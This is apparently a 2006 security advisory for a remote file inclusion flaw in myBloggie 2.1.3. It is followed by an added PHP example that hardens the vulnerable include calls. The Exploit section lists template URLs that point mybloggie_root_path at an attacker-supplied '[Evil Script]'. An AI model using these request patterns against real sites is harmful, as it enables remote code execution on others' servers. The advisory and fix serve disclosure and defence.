-----------------------------------------------------------------------------------------
myBloggie 2.1.3 mybloggie_root_path Remote File Inclusion
-----------------------------------------------------------------------------------------
Author         : Sh3ll
Date           : 2006/04/29
Location       : Iran - Tehran
HomePage       : http://www.sh3ll.ir
Email          : sh3ll[at]sh3ll[dot]ir
Critical Level : Dangerous
-----------------------------------------------------------------------------------------
Affected Software Description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : myBloggie
Version     : 2.1.3
URL         : http://www.mywebland.com , http://mybloggie.mywebland.com
Description : myBloggie is considered one of the most simple, user-friendliest yet packed with features Weblog system available to date.
-----------------------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~
In admin.php, index.php & db.php we found vulnerable scripts:

----------------------------------------admin.php----------------------------------------
....
...
----------------------------------------index.php----------------------------------------
....
    pparse('sidevert');
}
// End right sidemenu condition

// Sidemenu menu items. You can change the menu item order here
// $mybloggie_root_path is never assigned by the script before these lines and can be
// supplied by the request (see Exploit below), so every include() follows a path the
// requester chooses
include($mybloggie_root_path.'calendar.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'category.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'recent.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'archives.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'user.php');
include($mybloggie_root_path.'spacer.php');
if ($search) {
    include($mybloggie_root_path.'searchform.php');
    include($mybloggie_root_path.'spacer.php');
}
...
-------------------------------------------db.php----------------------------------------
....
...
-----------------------------------------------------------------------------------------
Exploit:
~~~~~~~
http://www.target.com/[myBloggie]/admin.php?mybloggie_root_path=[Evil Script]
http://www.target.com/[myBloggie]/index.php?mybloggie_root_path=[Evil Script]
http://www.target.com/[myBloggie]/includes/db.php?mybloggie_root_path=[Evil Script]

Solution:
~~~~~~~~
Sanitize the variable $mybloggie_root_path in admin.php, index.php & db.php
-----------------------------------------------------------------------------------------
Shoutz:
~~~~~~
~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams
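The Solution above says only "sanitize the variable". The following is an added example, not myBloggie's own code, showing the include pattern quoted from index.php next to a hardened form of it. It assumes a hypothetical helper `mybloggie_safe_path()` and an allow-list built from the sidemenu module names that appear in the quoted index.php; neither is part of the project.

```php
<?php
// Added example (not myBloggie's own code): the include pattern from the
// advisory alongside a hardened version of it.

// --- Vulnerable pattern (index.php as quoted in the advisory) ---
// $mybloggie_root_path is used without being assigned by the script, so a
// request parameter of the same name can populate it (PHP's register_globals)
// and include() then loads code from whatever location the request names.
//
//     include($mybloggie_root_path.'calendar.php');

// --- Hardened pattern ---
// 1. Assign the root path unconditionally from the script's own location.
//    Any value arriving in the request is overwritten before first use.
$mybloggie_root_path = dirname(__FILE__) . DIRECTORY_SEPARATOR;

// 2. Resolve each module against that directory and return a path only if it
//    is on the allow-list AND physically inside the root. The caller performs
//    the include itself so the included file keeps the global scope it expects.
//    (mybloggie_safe_path is a hypothetical helper, not a myBloggie API.)
function mybloggie_safe_path($root, $module)
{
    // Allow-list of the sidemenu modules named in the quoted index.php.
    static $allowed = array('calendar.php', 'spacer.php', 'category.php',
                            'recent.php', 'archives.php', 'user.php',
                            'searchform.php');
    if (!in_array($module, $allowed, true)) {
        throw new RuntimeException("Refusing to include unknown module: $module");
    }

    $rootReal = realpath($root);
    $target   = realpath($root . $module);
    // realpath() returns false for URLs, stream wrappers and missing files,
    // so a remote location can never reach the include below.
    if ($rootReal === false || $target === false) {
        throw new RuntimeException("Module not found under application root: $module");
    }
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    // Guard against traversal: the resolved file must sit below the root.
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException("Include path escapes application root: $module");
    }
    return $target;
}

// Same sidemenu sequence as index.php, now restricted to validated local files.
foreach (array('calendar.php', 'spacer.php', 'category.php', 'spacer.php',
               'recent.php', 'spacer.php', 'archives.php', 'spacer.php',
               'user.php', 'spacer.php') as $module) {
    include mybloggie_safe_path($mybloggie_root_path, $module);
}
if (!empty($search)) {
    include mybloggie_safe_path($mybloggie_root_path, 'searchform.php');
    include mybloggie_safe_path($mybloggie_root_path, 'spacer.php');
}
```

The first step alone closes the hole described in this advisory, because the request can no longer define `$mybloggie_root_path`; the allow-list and `realpath()` check are defence in depth for any other include that still builds its path from variables. On the PHP side, `register_globals = Off` removes the mechanism that lets a query-string parameter become a script variable, and `allow_url_fopen = Off` (and, on PHP 5.2 and later, `allow_url_include = Off`) stops `include()` from fetching remote code even if a path does slip through.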